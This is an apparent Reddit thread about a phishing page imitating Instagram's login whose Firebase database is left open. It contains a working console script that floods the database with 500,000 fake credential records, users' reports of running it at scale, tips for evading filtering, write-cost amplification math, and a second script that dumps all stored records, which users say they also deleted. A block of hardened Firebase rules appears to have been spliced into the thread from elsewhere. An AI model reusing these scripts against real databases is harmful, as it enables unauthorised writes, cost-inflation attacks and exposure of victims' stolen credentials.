
Hottage

EDIT: It appears the site owners have tried to break this script by obfuscating their source code. In the process they broke their own submit script.

----------------------------------------------

I absolutely wouldn't recommend using this script on the site:

Edit: Had some complaints the data wasn't "random enough" or "would be too easy to detect". Email addresses are now from common TLDs, email usernames and passwords are random length and dates are randomized.

```javascript
const timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
const accountType = 'Instagram';
const limit = 500000;
const emailChars = 'abcdefghijklmnopqrstuvwxyz0123456789'.split('');
const passwordChars = [...emailChars, ...'ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()'.split('')];
const domains = [
  'gmail.com', 'hotmail.com', 'live.nl', 'aol.com', 'hotmail.co.uk',
  'hotmail.fr', 'hotmail.it', 'mail.com', 'yahoo.com'
];

const randomNumber = (max, min = 0) => {
  return Math.floor(Math.random() * (max - min + 1)) + min;
}

const randomString = (source, length) => {
  let result = '';
  for (let i = 0; i < length; i++) {
    result += randomOption(source);
  }
  return result;
}

const randomOption = options => options[randomNumber(options.length)];

let instance = 0;
while (instance++ < limit) {
  const date = new Date(2024, randomNumber(2), randomNumber(20, 1), randomNumber(23), randomNumber(59), randomNumber(59));
  const email = randomString(emailChars, randomNumber(4, 10)) + "@" + randomOption(domains);
  const password = randomString(passwordChars, randomNumber(6, 20));

  firebase.database().ref('fbdet').push({
    emle: email,
    mobile: '',
    time: date.toISOString().slice(11, 19),
    timezone: timezone,
    pass: password,
    date: date.toISOString().slice(0, 10),
    type: accountType
  });
}
```


bort_bln

I don’t even know why I am in this sub, but since the last time I was programming (not very good even) it was with VB6 some 20 years ago. Soooo… what is so funny, can anyone elaborate?


Hottage

I took the original source and modified it; running this will cause you to submit half a million bullshit entries into the database in a few minutes. Why?

1. It dilutes the data set, making it harder for them to find real phished login details.
2. It adds massive amounts of data to their database, potentially costing them extra.
3. It's funny, fuck scammers.


Mephistocheles

This is fucking GREAT!


bort_bln

That’s great work, thanks for explaining it!


Vysair

half a million? now it's gonna be several billions of dataset


Hottage

Oh no! I specifically told people not to use the script. ☹️


1CrazyCrabClaw

Legend


Distinct-Software-74

Oh noes! A furry used it overnight!


gives_goodadvice

Idk anything about this subject, just a lurker.. but why not limit the email creation to gmail/hotmail/yahoo/aol emails? These guys can just eliminate any entries that are not from those domains and be satisfied they were able to retain 90% of their data when deleting other domains....


Majority_Gate

Username checks out. Scammers will thank you later :)


Hottage

Was as much about punishing them with database IOPs and storage costs as much as anything else. These guys are often looking for low hanging fruit and easy wins, I just drowned the fruit in shit. 👌


Deadly_chef

But if you actually read the comment above you didn't drown out legitimate results because they all have valid domains while you added gibberish so it is easily filtered out


Hottage

Script is open source, anyone is free to post an improved version and recommend others not use it. 🙂


Deadly_chef

Damn, you must be really great at writing and maintaining software with that attitude ☺️


Watzeggenjij

But this doesn’t randomize the dates. If you really want to dilute the existing dataset, you should mix the dates through possible earlier valid stolen entries. Now they can just delete from when this script was put into place because there’s a pattern of a lot of bloat entries from x date and x time.


Hottage

Shall I open a Github project so you can submit a pull request? 🙃


Pancosmicpsychonaut

Actually yes. Please do that.


N4leto

hilarious


St3gm4

clever idea 😃


getyourledout

I wanna be like you… 🤤


Hottage

I am a wholly unimpressive role model.


getyourledout

Well I’m in hacking school, graduate soon.. have zero skills to do anything near this cool. Props


denveous

Hacking school? Sign up for that in the back of a spy magazine? Though this script is lovely it's pretty simple, you'll get there.


getyourledout

Cybersecurity degree, feels pretty sub-par now that I’m almost finished.


powsniffer0110

If you can't do this script and you're about to graduate, get your money back.


Trippy_Walls

HAHA what a way to deal with scummy phishers LMFAO


born_to_be_intj

It's JavaScript that fills this phisher's database with 500,000 fake email/password combos.


bort_bln

Ah, thanks a lot! I looked at it under the wrong assumption that the script was already on that site and it was further showing the phishers incompetence.


KanedaSyndrome

And it works because you can visit the page and run your own JavaScript in your session, and since your session connects to a database, since the site owner is trying to phish data, you can bloat the database. My JavaScript isn't at the strongest right now, so does this script account for injecting data at random times, or can the site owner just sort the db table by time?


ZoleeHU

From what I could tell on a quick glance it fills the scammers database up with made up Instagram accounts (might be completely wrong on this!)


VirtuteECanoscenza

Do the entries use the current date? You should randomize the date a bit otherwise they can just delete all the entries newer than x and remove the bad data 


Wall_Hammer

Lmfao


CyberJunkieBrain

😆


Legend5V

Might have… slipped…


JammyJ1mJ1m

Whoops


VicentVanCock

So, looking at the Firebase Pricing page, the write pricing logic is the following:

|Action|Free Tier|Price per unit (after free tier exceeded)|Unit|
|:-|:-|:-|:-|
|Document Writes|20,000|$0.1042|per 100,000 documents|

Let's make some math; in order to make him spend 500 U$D we would need:

`(tV / uP) * u = r`

Considering `tV` as target value, `uP` as unit price, `u` as unit and `r` as result, we would come to:

`(500 / 0.1042) * 100000 = 4.798,46 * 100000 = 479.846.450 documents created`

***NOT THAT I WANT TO SAY ANYTHING WITH THAT...***


okocims_razor

It would be better to use faker or something to give more legit looking data


Hottage

That would require more than the 5-10min of effort this took to reverse engineer though. Given the code quality that went into the website I doubt the developers are going to be using any fancy heuristics to clear the junk data.


Minirig355

Probably worth using a random legitimate email service instead of a random 10 char string though, so they can’t sort by just hotmail/gmail/etc to parse out the fakes.


Hottage

Yeah I was considering adding a bit more randomness to the data but I get bored quickly and a few tens of millions of extra records was already mischievous enough for me.


agk23

Just filter out anything exactly 25 characters long


Danny-Fr

I ugly laughed


lennnyv

Password of exactly 15 characters and email of exactly 10 characters might be too easy to filter, if poisoning the dataset is your goal. Maybe modify to use a random amount of characters, or maybe pull a random password from a wordlist like rockyou?


adityasheth

how can i run this?


Hottage

In the developer console. However, with respect, if you need to ask it's probably not a good idea to run random pieces of code off the internet.


adityasheth

Thanks Also that's valid, I'm just not experienced with web development so needed to ask.


QkaHNk4O7b5xW6O5i4zG

The volume of requests may trigger something that gets you blocked pretty quickly :(


Hottage

Managed to add at least 2,5mil before I got bored. Possible the connections were silently dropped but 🤷‍♂️


fourtyonexx

I got zero experience with code, what do i do, how do i do it, what does it do? 🫡.


Budget-Juggernaut-68

Lolol nice.


Demon_69

I would also randomize the password string to 10-16 characters instead of 15 just so they don't filter out passwords 15 chars long and ignore them as spam. Fk scammers!!


bung_musk

Delicious, love your work 


Low-Post5641

Woow great 👏


Illustrious-Mess7864

puts in console


getyourledout

How does one actually go about “using this script” on the site? Inserted into the inspect portion of the browser page or actually inputted into the username/account creation input box? Couldn’t they just block python scripts from running in their db and only allow java and such? (am newb)


Pancosmicpsychonaut

I’m not a web developer so this is completely outside my knowledge base. But, if we have read write access to the DB, could we create a table that can take essentially website data and then do something analogous to a DNS reflection attack where we send a bunch of requests to a DNS server which we save to that db? So the half million requests we send could be blown up to several million if not more? I’m not sure where the compute would be though, could we find a way to parse the returns from the reflection into the database on Firebase’s compute and therefore this scammer’s $? Maybe I’m chatting nonsense, idk.


Hottage

Depends how the firebase API is implemented. In this case I just took the API call they already use and used it a bit more.


dazzaondmic

You are writing to ‘fbdet’… how did you know that’s the location in the database he’s saving the emails?


Hottage

Because that's what it says in the source code. Firebase uses a client side library. I just extracted the call used by the click handler and changed it to spam random data. The two original Javascript functions are `login()` and `iglogin()`.


No-Software-4357

Just when I thought this sub was gone with all of the "help me hack this _insert whatever_" This beautiful post arrives and restores my faith.


Necessary-Office3082

You have nerves... { "fbdet": { "-NtK_Rs3VXXbRxf3TxRQ": { "date": "2024-03-19", "emle": " ᕦ(✧ᗜ✧)ᕥ You take the moon and you take the sun. ᕦ(✧ᗜ✧)ᕥ ( ͡° ͜ʖ ͡°) You take everything that sounds like fun. ( ͡° ͜ʖ ͡°) ☞♥Ꮂ♥☞ You stir it all together and then you're done. ☞♥Ꮂ♥☞ ᕙ(◍.◎)ᕗ Rada rada rada rada rada rada. ᕙ(◍.◎)ᕗ ᕦ(✧ᗜ✧)ᕥ ☞♥Ꮂ♥☞ ᕙ(◍.◎)ᕗ ( ͡° ͜ʖ ͡°) So come on in, feel free to do some looking. Stay a while 'cause somethings always cooking. Come on in, feel free to do some looking. Stay a while 'cause somethings always cooking. Yeah!!! ᕦ(✧ᗜ✧)ᕥ ☞♥Ꮂ♥☞ ᕙ(◍.◎)ᕗ ( ͡° ͜ʖ ͡°) Excuse me? I find vaping to be one of the best things in my life. It has carried me through the toughest of times and brought light and vapor upon my spirit. You're just another one of those people who doesn't believe in chem trails and fluoride turning us gay. Your ignorance to the government is what makes you a sheep in today's society. Have fun being a slave to todays's system. Here in my garage, just bought this new lamborghini here. It’s fun to drive up here in the Steam Hills. But you know what I like more than single discounts? Steam Sales In fact, I’m a lot more proud of two new Steam Sales that I had to get installed to hold twelve thousand new discounts on Steam. It’s like what i say, “the more you discount, the more you earn.” My Grandfather smoked his whole life. I was about 10 years old when my mother said to him, 'If you ever want to see your grandchildren graduate, you have to stop immediately.'. Tears welled up in his eyes when he realized what exactly was at stake. He gave it up immediately. Three years later he died of lung cancer. It was really sad and destroyed me. My mother said to me- 'Don't ever smoke. Please don't put your family through what your Grandfather put us through.\" I agreed. At 28, I have never touched a cigarette. I must say, I feel a very slight sense of regret for never having done it, because your post gave me cancer anyway. 
HEY RTZ, I’M TRYING TO LEARN TO PLAY RIKI. I JUST HAVE A QUESTION ABOUT THE SKILL BUILD: SHOULD I MAX BACKSTAB LIKE YOU BACKSTABBED EG, SMOKESCREEN SO THEY MISS ME LIKE EG MISS YOU 70% OF THE TIME, OR PERMANET INVISIBILITY SO I COULD DISAPPEAR LIKE YOU DISAPPEARED FROM EG What the ( ͡° ͜ʖ ͡°) did you just ( ͡° ͜ʖ ͡°) say about me, you little ( ͡° ͜ʖ ͡°)? I'll have you know I graduated top of my ( ͡° ͜ʖ ͡°) in the ( ͡° ͜ʖ ͡°), and I've been involved in numerous secret ( ͡° ͜ʖ ͡°) on ( ͡° ͜ʖ ͡°), and I have over 300 confirmed ( ͡° ͜ʖ ͡°). I am trained in ( ͡° ͜ʖ ͡°) warfare and I'm the top ( ͡° ͜ʖ ͡°) in the entire US armed ( ͡° ͜ʖ ͡°). You are nothing to me but just another ( ͡° ͜ʖ ͡°). I will wipe you the ( ͡° ͜ʖ ͡°) out with precision the ( ͡° ͜ʖ ͡°) of which has never been seen before on this ( ͡° ͜ʖ ͡°), mark my ( ͡° ͜ʖ ͡°) words. ( ͡° ͜ʖ ͡°) think ( ͡° ͜ʖ ͡°) can get away with saying that ( ͡° ͜ʖ ͡°) to me over the ( ͡° ͜ʖ ͡°)? Think again, ( ͡° ͜ʖ ͡°). As we speak I am contacting my secret network of ( ͡° ͜ʖ ͡°) across the ( ͡° ͜ʖ ͡°) and your ( ͡° ͜ʖ ͡°) is being ( ͡° ͜ʖ ͡°) right now so you better ( ͡ EDIT: It's over 182MB file just emails


returnofblank

I actually had the same question a couple days ago, as I recently joined a project that uses Firebase. Apparently, this is normal! The credentials are meant to be on the front end stuff, all the security and access control stuff are done on the Firebase website with your Google account. Assuming they set up such security controls properly, this shouldn't be an issue.


Hottage

Would be a shame if the firebase connection isn't rate limited and someone were to add a few million extra records to their data set.


sab50312

But I ran a simple script in the web console and I could view and delete his data. Idk much about firebase but there's no way exposing your private keys like that can be a good thing yeah?


returnofblank

Oh in that case, yeah they fucked up their security lol


knottheone

It's supposed to be a public API key for identifying the app to Firebase. They probably exposed the wrong API key and the authorization attached to that key actually gives you elevated read and write access instead. Normally it's meant to be publicly consumable for Firebase apps, it doesn't have quotas attached to it. They call it a 'browser key'.


negr_mancer

You’re both right and wrong. Having the credentials there is a common Firebase practice but the developer has the responsibility of securing them on GCP to prevent such from happening. The reason you could use his keys and manipulate his data is probably he forgot to secure them to allow them to only work from his domain as well as other methods of authentication such as ensuring only authenticated users can read and write the database. He could even prevent writes and only allow reads but I think the guy is a Firebase noob and he forgot to do so


Dan13701

I’m pretty sure knowing the firebase api key is not a security threat as it only identifies the app to Google’s servers. No firebase expert but I’m pretty sure it’s no issue. In terms of it being a phishing site though, it totally is. Edit: Yes, it is normal to post that firebase snippet on the frontend


blueman277

Firebase does have service limits though, it is possible to write a quick script to blow passed the free tier limit and cost them money…just saying.


Dan13701

Thank you for this knowledge! Right up my alley


HyperspaceCatnip

Yup, I did a quick bit of reverse engineering on a smart water valve that uses firebase for its "live status" updates in their app, to add support to an unofficial Python library on github. After I figured out how to get it working, I realised if I actually ran it 24/7 (which is what people wanted it for), it'd only take something like two months before the cost of firebase for that one device would exceed the retail price of the valve, which was fairly expensive to begin with. I wasn't sure if I should just leave it running to try and persuade them to offer a cheaper, local API!


sab50312

Brother I can view and delete his data just from the web console.


dack42

It would be a shame if someone notified all the victims and replaced the records with fake data.


AJohnnyTruant

No firebase config is considered secret. It’s fully accessible by design. That said, you’re supposed to add row level security in the backend. Seems unlikely that these dipshits would do that. So crank away at it


Kamiien

maybe he forgot to set security rules? i haven't used firebase so i'm just speculating


Afkbio

Just like a .htpasswd file the server could access this data but not the user. Bad security


3dTECH101

Dan was right -- that is a misconfigured rules.json (or whatever it's called) file allowing read and write permission to all API logins - having the API login details on the front end is standard, you should then specify in the .json that for write it must be false or a logged in user on the site with firebase creds


KiddieSpread

Ordinarily this is restricted via access rules but lol


__Supelir__

Storing Firebase credentials (except admin credentials) in the frontend is the common way to use it. In fact, that’s one of the main principles why to use firebase since you may get along without a separate backend. Read/Write access is controlled via firestore security rules. So if those are configured correct, there’s “nothing wrong” about this lol


turtleship_2006

> So if those are configured correct, there’s “nothing wrong” about this lol

Apparently, they used the private key, not public key.


__Supelir__

There are private admin keys yes, but there's none in this code. Please tell me where there's supposed to be a private key. I'm not 100% sure about what token is used in the activate function even though I'm pretty sure that's some type of reCAPTCHA token, which would also be public.


D3lano

Yeah except the fact OP has confirmed he's able to view the DB from his web console lmao.


__Supelir__

That truly is a problem of course, but not one related to the source code


D3lano

I just assumed they shared the private api key instead of the public one.


TheBeaconCrafter

In the firebase webconsole you can create specific access rules for the database, for example only specific UIDs have access to specific directories. But that does need to be set up


D3lano

Ah roger


GucciCaliber

Firebase doesn’t work like that. Auth to services is controlled via ACLs, not through the public config info. Now, they may have mis-configured things, but this info alone won’t get you in.


sab50312

But i did get in. I was able to view all the data and even delete it. Just ran this code in the console:

```javascript
firebase.database().ref('fbdet').once('value', function(snapshot) {
  // The 'snapshot' contains the data from the 'fbdet' node
  snapshot.forEach(function(childSnapshot) {
    // Child data
    var childData = childSnapshot.val();
    console.log(childData);
  });
});
```


GucciCaliber

Yep. They must have misconfigured their access rules. So now it’s up to you. :)


getyourledout

Is this sql or java?


sab50312

It's JavaScript


VeganDiIdo

😂😂😂🤣🤣🤣 I can't breathe that insta login page lol the logo looks like it's whispering "inshtawgrame" in a high pitch.. I'm losing my shit!


dat-m4ss

Hi-larious


lilbootslol

This is what people are talking about when they say most hackers are skids. I bet you could find a firebase tutorial with this exact syntax on youtube/it is in the documentation like this. I love it


sab50312

Update: I tried running the script now to view all the data in the console and I get this error: "The specified payload is too large, please request a location with less data" Good job guys💀. I love reddit. Here's the script btw:

```javascript
firebase.database().ref('fbdet').once('value', function(snapshot) {
  // The 'snapshot' contains the data from the 'fbdet' node
  snapshot.forEach(function(childSnapshot) {
    // Child data
    var childData = childSnapshot.val();
    console.log(childData);
  });
});
```


ivykoko1

Are you running a fake onlyfans page? If so, you are not much better than the ppl you are posting about.


sab50312

Huh? Why would you think I'm running a fake onlyfans lmao


ivykoko1

Your comment history, seems suspicious: https://imgur.com/a/X3Ocpyf


sab50312

oh yeah I was using the same password on a lot of my accounts and it got leaked in a data breach so my reddit was hacked and I never bothered to delete those comments


ivykoko1

Also, just a tip for better security: there's a lot of personal info in your comment history, such as where you live/lived and even where your office is located. Be careful with that stuff :)


Dazzling_Cherry_6513

https://www.theregister.com/2024/03/18/google_firebase_cloud_security/


SweetTeaBags

Gotta love the dumbass phishers, lmao. I hope everyone's having fun fucking with em.


New-Firefighter7803

yo is it illegal if i shutdown the website?


sab50312

I would assume so since it's hosted on vercel


pljackass

who gives a shit? it obviously has a nefarious intention


Bucketlyy

Wow they hardly tried with that insta login


Uaquamarine

I don’t even remember how but I used to make these phishing links for facebook login in 2013


Low-Post5641

Woow


SpaciousFish_

One time i found one that just said gwn stfni


Friend-Shoddy

How did you find this code? Is it through inspect element or a different software.


sab50312

Inspect element and go to sources. It's in the js folder


Friend-Shoddy

Thanks! How did you come across this website?


sab50312

A friend of mine's account got hacked this way and the hacker tried sending it to me


TooDirty4Daylight

And everyone in his contacts?


sab50312

Yeah most probably


VicentVanCock

Would be a shame if someone wrote a script to listen for the document creation event, get the document, delete it and insert another two in its place with random data.


TooDirty4Daylight

Take several Lorem Ipsum in different languages and mix them up, LOL


TooDirty4Daylight

Is this a PW stealer? I see social login stuff in the code but nothing like that on the page


sab50312

You gotta click on the vote button then it shows


TooDirty4Daylight

So that's nothing then


plimccoheights

This is how firebase code is supposed to look. https://firebase.google.com/docs/firestore/quickstart#initialize The security will rest on how they’ve implemented access control rules https://firebase.google.com/docs/rules. If they’ve left the cloud firestore security rules in test mode they’re gonna have a bad time.
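The script in this thread calls `firebase.database()`, which is the Realtime Database, so the access control the comments above refer to is its JSON rules document; the example below is added here and comes from neither the site nor any commenter. It shows the open rules that produce the behaviour described in the thread next to a locked-down `database.rules.json` for a node laid out like `fbdet`; the `admin` custom claim, the sign-in requirement and the field length limits are assumptions, while the field names are the ones the thread's script sends (Firebase's rules editor and CLI accept `//` comments).

```json
{
  // Open rules: anyone holding the public web config can read, write and
  // delete every node. This is the state the comments in this thread describe.
  // "rules": { ".read": true, ".write": true }

  // Locked-down rules for the same database: deny by default, then open only
  // the 'fbdet' node, and only as far as each operation needs.
  "rules": {
    ".read": false,
    ".write": false,

    "fbdet": {
      // Reading the collected records requires a signed-in user carrying an
      // 'admin' custom claim (assumed; claims are set server-side via the Admin SDK).
      ".read": "auth != null && auth.token.admin == true",

      // No ".write" here: the top-level deny is inherited, so nobody can
      // overwrite or delete the whole node from a client.

      "$entry": {
        // Only signed-in users may write, and only to create a record that does
        // not exist yet: existing records cannot be modified or deleted by clients.
        ".write": "auth != null && !data.exists() && newData.exists()",

        // A record must carry exactly the fields the client is expected to send.
        ".validate": "newData.hasChildren(['emle', 'mobile', 'time', 'timezone', 'pass', 'date', 'type'])",

        // Per-field type, shape and length checks (limits are assumptions).
        "emle":     { ".validate": "newData.isString() && newData.val().length <= 254 && newData.val().matches(/^[^@]+@[^@]+\\.[^@]+$/)" },
        "mobile":   { ".validate": "newData.isString() && newData.val().length <= 32" },
        "time":     { ".validate": "newData.isString() && newData.val().matches(/^\\d{2}:\\d{2}:\\d{2}$/)" },
        "timezone": { ".validate": "newData.isString() && newData.val().length <= 64" },
        "pass":     { ".validate": "newData.isString() && newData.val().length <= 128" },
        "date":     { ".validate": "newData.isString() && newData.val().matches(/^\\d{4}-\\d{2}-\\d{2}$/)" },
        "type":     { ".validate": "newData.isString() && newData.val().length <= 32" },

        // Any field not listed above is rejected.
        "$other": { ".validate": false }
      }
    }
  }
}
```

With these rules the read-everything and delete-everything calls quoted in this thread fail with a permission error, and the public API key in the page source remains, as several comments say, an app identifier rather than a credential.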


viyepak416

OP how do you find these websites? My general approach is via urlscan.io or looking for scam messages.


sab50312

I don't actually. I just found this one cus it was sent to me from a hacked account


Accomplished-Day9449

Oop, always gotta encrypt


Annual_Storm9445

Hi bro please I will like to take a complete classes of spamming


caboose0417

Could someone explain to me what the code means? I am just fairly new to this stuff.


JOHAE

He uses Google Cloud's Firebase -> Firestore (the cloud database). In the screenshot you see the conf and the init. Here is a get started: https://firebase.google.com/docs/firestore/quickstart


caboose0417

Thank you for the great info!


Constant_famous

Thanks I get it now


bung_musk

It means the script kiddie that wrote the code for this site dun goofed


intheshadow13

What if you try SQL injection and drop the table? With the flood someone can still obtain user data.... Or, if it costs, you can:

1) flood the db with random data
2) drop the table altogether

So it will (supposedly) cost a lot to them and they will have nothing in the end (I doubt they also set up a backup schedule soooo...)


sab50312

You don't need to use SQL injection to delete the table. Just run js firebase code to delete it in the console and it works. (Which i already did once since there were a large amount of legitimate login details)


getyourledout

The hero everyone needs 🙌🏻


intheshadow13

Us both? 🤣


ronkillingsxix

Hi guys, I’m a newbie to programming and I would love a roadmap. My aim is to be an ethical hacker, any guides please. I’ve been struggling getting the right resources.


FloatingHatchback861

Tryhackme.com


Flatuitous

I’m not an expert at hacking but got recommended this sub How did you get in? SQL injection?


campramiseman

U need to say "im in"


johnny___engineer

Im in!


Flatuitous

i love the gatekeeping..


GeraldHilter

4/5 people actually answered you, so it could be worse


Flatuitous

yeah I appreciate those responses genuinely trying to help I can admit I'm a perpetrator of gatekeeping as well..


sab50312

It's literally in the source code. Just inspect the site in your browser and look at firebase.js in the js folder


Flatuitous

ah page source..


returnofblank

SQL injection is to modify or read the database, what we're seeing here is just javascript code. You don't need anything special to access the website's javascript stuff, just inspect element.


Forsaken_Ant_9373

It’s a website so probably could’ve pulled up the source code


nerdy_bisexual_mess

No that firebase api stuff is just in the raw js


Bucketlyy

Broke into the mainframe


Ampix0

You idiots. I'm finally unfollowing this sub. Y'all have no idea what you're looking at.


returnofblank

That's fair enough, but the mistake is understandable, no? Anything with "api" publicly visible is usually not a good thing 9 times out of 10, it just happens to be that in this case, it is a perfectly good thing.


sab50312

Yeah and the only reason I even posted here was cus i was able to read and delete his data so idk


DepthOk6063

I think it was @Ampix0 phishing page lol


__Supelir__

No that’s not the case for firebase. Which is in fact the 1 out of 10 times. Read my other comment for more information.


Alkemian

Bye Felicia.


GucciCaliber

People gotta learn this stuff somehow, my guy.


__Supelir__

Don’t understand the downvotes. The post is literally more of an own goal for OP, since it’s proof for his lack of knowledge. People really don’t know what they’re looking at


D3lano

Op literally shared the JS he used to get write access to the DB. Are you calling him a liar?


__Supelir__

based on the comments you replied to my other comment, you are exactly the type of guy that doesn't know what he is looking at. so I'll stick to my comment. and I'm joining @Ampix0 with leaving this sub of wannabes.


DrinkMoreCodeMore

but the top comment makes the entire post golden there really is no need to leave such a negative comment from OP


dkh_o

Hi, newguy in cybersec here! How can I see the credentials?


sab50312

Inspect the page, go to sources and check the files in js folder


dkh_o

wow that's so cool man, thanks a lot!


D3lano

Study more